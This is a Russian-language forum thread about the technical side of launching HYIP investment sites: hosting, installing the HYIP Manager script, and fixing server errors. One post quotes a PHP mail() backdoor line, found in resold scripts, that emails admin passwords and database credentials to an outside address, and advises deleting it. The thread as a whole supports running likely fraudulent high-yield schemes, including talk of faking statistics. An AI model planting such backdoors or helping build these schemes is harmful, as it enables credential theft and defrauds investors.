Чисто технические моменты создания HYIP фондов. - Страница 3

Каким фондам Вы более всего доверяете?

• 1-3 % в день

Голосов: 9 75.0%
  • 10- 30 % в день

Голосов: 2 16.7%
  • 110- 150 % в день

Голосов: 0 0.0%
  • 200 - 500% в день

Голосов: 1 8.3%

• Всего проголосовало
    12
  • Опрос закрыт .

kloffer

Профессионал
Реакции
13
Поинты
0.000
был вопрос не помню в какой ветке, но здесь это тоже будет по теме :)
если даже купленый скрипт (естественно не у производителя, а подешевше) при инсталляции или уже при использовании будет посылать на мыло "нехороших людей" (т.е. естественно тем кто продал скрипт) пароли для входа и редактирования аккаунтов и всех настроек, то и вытекает вопрос
Интересно, а можно определить куда и что отправляется при инсталляции? Я имею ввиду все отправления почты.
что бы конкретно знать, что и куда отправляет скрипт.
и где вообще этих "жучков" искать?

и еще вопрос, как можно найти инфу (строчку, слово) по всей папке. например стандартный виндовский поиск не может найти по файлам с нестандартным расширением. т.е. что бы задав папку поиск выдал файл в котором содержиться например слово "привет". со стандартными расширениями типа txt проблем нет, но например файлы tpl никак не хочет просканивать, даже когда файл уже ассоциируешь с блокнотом. пишет "поиск закончен, результатов 0".

Последнее редактирование:

spetka

Специалист
Реакции
4
Поинты
0.000
лучьше всего скрипт самому придумать, тада не будет голова болеть, что и куда уходит с твоего скрипта))) не так это и сложно только времени надо много чтоб рзобратся))) ну и инвесторов на дилетантский скрипт особо не привлечешь) так только друзья поддержут)

balalaikin

Любитель
Реакции
0
Поинты
0.000
есть старый хостинг для hyip с ДДоС защитой от 10$ в месяц, это http://www.zydusnet.com/
Пишут, что защиту предоставляют за такие маленькие деньги, потому что обслуживают более 1000 сайтов.

да, и падает постоянно , работает типа нашего робохоста, 10 дней пашет 3 лежит

был вопрос не помню в какой ветке, но здесь это тоже будет по теме :)
если даже купленый скрипт (естественно не у производителя, а подешевше) при инсталляции или уже при использовании будет посылать на мыло "нехороших людей" (т.е. естественно тем кто продал скрипт) пароли для входа и редактирования аккаунтов и всех настроек, то и вытекает вопрос

что бы конкретно знать, что и куда отправляет скрипт.
и где вообще этих "жучков" искать?

и еще вопрос, как можно найти инфу (строчку, слово) по всей папке. например стандартный виндовский поиск не может найти по файлам с нестандартным расширением. т.е. что бы задав папку поиск выдал файл в котором содержиться например слово "привет". со стандартными расширениями типа txt проблем нет, но например файлы tpl никак не хочет просканивать, даже когда файл уже ассоциируешь с блокнотом. пишет "поиск закончен, результатов 0".

если найдёш такое то укоцай

mail ('[email protected]', 'Admin logged-trans', '' . 'Admin entered to admin area
ip='.','.$frm_env[REMOTE_ADDR].','.$settings['site_name'].','.$settings['site_url'].','.$settings['hostname'].','.'-user:'.$luser.','.'-password:'.$lpassword.','.$settings['database'].','.$settings['db_login'].','.$settings['db_pass'], '' . 'From: ' . $settings['system_email'] . '
Reply-To: ' . $settings['system_email']);

kloffer

Профессионал
Реакции
13
Поинты
0.000
я не понял это одна строка или перечисления через запятую? Или это весь блок нужно искать? И подскажи уже в каком файле это может находится.
Начал разбираться в скрипте и это оказалось прикольным :) Че то добавлять, удалять методом тыка. Вообще можно учиться написанию скриптов на конкретных примерах, необязательно HYIP, но это тоже занимательно что то изменять, а потом видеть результат :)
А в базе данных через phpmyadmin там ваще темный лес для меня. Как найти какая переменная отвечает за какое то число в конечном результате? Вот например слышал, что админы накручивают статиситку, я так понимаю, что делают они это через базу данных... Где эти переменные? Хочу сам себе на счет в фонде положить денег и поэкспериментировать с ними, но не хочу связываться с реальными деньгами :) т.к. скрипт нашел бесплатный и боюсь, что они улетят.
Вот главное меню phpmyadmin:
hm2_deposits
hm2_emails
hm2_exchange_rates
hm2_history
hm2_news
hm2_online
hm2_pay_errors
hm2_pay_settings
hm2_pending_deposits
hm2_plans
hm2_processings
hm2_referal
hm2_referal_stats
hm2_settings
hm2_types
hm2_users
hm2_user_access_log
hm2_wires
в какой ветке искать эти переменные которые отвечают за баланс в аккаунте?
Ответьте кто знает, очень интересно стало, потому что пытался себе на аккаунт бонус начислить через вход админа, запрашивает Confirmation Code:, но что бы я не вводил пишет потом "Bonus has been sent. Invalid confirmation code.", че делать?
а где его взять? я при инсталляции скрипта его не вводил :( в каком файле его можно поменять?
ЗЫ скрипт HYIP Manager от GC

Hyip-Manager

Новичок
Реакции
0
Поинты
0.000
да, и падает постоянно , работает типа нашего робохоста, 10 дней пашет 3 лежит
очень стабильно работает, по крайней мере последние 6 мес. Единственная у них проблема - регистратор банит домены hyip, да это у всех так, кто-то абузит.

.....
Ответьте кто знает, очень интересно стало, потому что пытался себе на аккаунт бонус начислить через вход админа, запрашивает Confirmation Code:, но что бы я не вводил пишет потом "Bonus has been sent. Invalid confirmation code.", че делать?
а где его взять? я при инсталляции скрипта его не вводил :( в каком файле его можно поменять?
ЗЫ скрипт HYIP Manager от GC
Confirmation Code ищи на мыле admin@твой_домен или мыло ты указываешь при отправке бонуса. Тренируйся здесь (Login: admin Password: demo)

Для скрипта OroHYIP, который я предлагаю, нет необходимости в Confirmation Code - всё просто и безопасно! Для него тренируйся здесь (Логин: admin Пароль: demo - административный доступ. Логин: demo Пароль: demo - пользовательский доступ или создайте аккаунт самостоятельно)

ЗЫ: про phpmyadmin лучше доступ в cpanel дай тому, кто готов ответить, а потом у него же спрашивай.

kloffer

Профессионал
Реакции
13
Поинты
0.000
Confirmation Code ищи на мыле admin@твой_домен или мыло ты указываешь при отправке бонуса.
Ну спасибо! Так затупить! Я ж не создал даже почтовый адрес :biggrin2:
Что нужно было первым делом сделать - вообще забыл :t-1doh:
Ящик не открывал, т.к. у меня в бате их уже 14 штук. Поставил маршрутизацию на один из своих. Письмо с кодом пришло мгновенно! А я столько долбался!

kloffer

Профессионал
Реакции
13
Поинты
0.000
Кто поможет?
На одном хостинге было все нормально.
На другом проблемы.
Залил скрипт. Запускаю http://www.название сайта/install.php
Выскакивает окно ошибки:
Internal Server Error
The server encountered an internal error or misconfiguration and was unable to complete your request.

Please contact the server administrator, webmaster@название сайта.msk.ru and inform them of the time the error occurred, and anything you might have done that may have caused the error.

More information about this error may be available in the server error log.

Additionally, a 500 Internal Server Error error was encountered while trying to use an ErrorDocument to handle the request.
Apache/1.3.41 Server название сайта.msk.ru Port 80

Скрипт рабочий 100%, на другом хостинге сразу переходил на установочную панель.
Какая то причина в настройках, но не могу понять в чем.
Помогите новичку.

hyip-man

Любитель
Реакции
0
Поинты
0.000
Ошибка 500 "Internal Server Error" возникает, если в скрипте есть ошибки, либо в файле .htaccess лежит неправильная инструкция. Посмотри файл error.log на предмет обнаружения косяков.

Основываясь на личном опыте общения со скрптом от GC могу сказать, что для начала надо проверить режим передачи файлов по FTP. HyipManager нужно передавать в двоичном (Binary) режиме, а не в текстовом (ASCII), об этом даже на сайте GC написано.
Также, если ты просто залил на хостинг архив и там разархивировал, то работать он тоже откажется.

kloffer

Профессионал
Реакции
13
Поинты
0.000
А что вообще нужно в файле .htaccess писать?
Просвети если знаешь.

И еще.
У хоста в "Обработчики Apache" следующее:

Системные обработчики ApacheОбработчик Расширение(я)
cgi-script .cgi .pl .plx .ppl .perl
server-parsed .shtml

но нету php. это что то значит?

И вот мой лог файла ошибок:
[Fri May 16 15:45:07 2008] [alert] [client 14.132.112.178] /home/kloffer/public_html/.htaccess: Invalid command 'php_value', perhaps mis-spelled or defined by a module not included in the server configuration
перевод:
Недействительная команда 'php_value', возможно написала c орфографическими ошибками или определила модулем, не включенным в конфигурацию сервера
Что это значит? И что делать с этим .htaccess?

hyip-man

Любитель
Реакции
0
Поинты
0.000

Hyip-Manager

Новичок
Реакции
0
Поинты
0.000

vlastelin

Новичок
Реакции
10
Поинты
0.000

hyip-man

Любитель
Реакции
0
Поинты
0.000
Админ панели? Если да, то от GK нет таковой. Другого разработчика - есть админ панель на русском языке.

официально нет. Но 100% знаю, что есть версия, переведенная народными умельцами. Русское все, включая админпанель =)

vlastelin

Новичок
Реакции
10
Поинты
0.000
официально нет. Но 100% знаю, что есть версия, переведенная народными умельцами. Русское все, включая админпанель =)

Это ты о скрипте какого разработчика имеешь ввиду?

hyip-man

Любитель
Реакции
0
Поинты
0.000
Это ты о скрипте какого разработчика имеешь ввиду?

GK.
Правда перевод коряват слегка, но пониманию не мешает.

ЗЫ: если в скрипте есть "закладки", которые при установке скрипта посылают данные на чужое мыло, то по-идее, если я после установки скрипта поменяю пароль к БД, то это меня обезопасит? Повторно он посылает данные или только при установке?

Вложения

• GK1.GIF
    GK1.GIF
    86.5 KB · Просмотры: 36
Сверху Снизу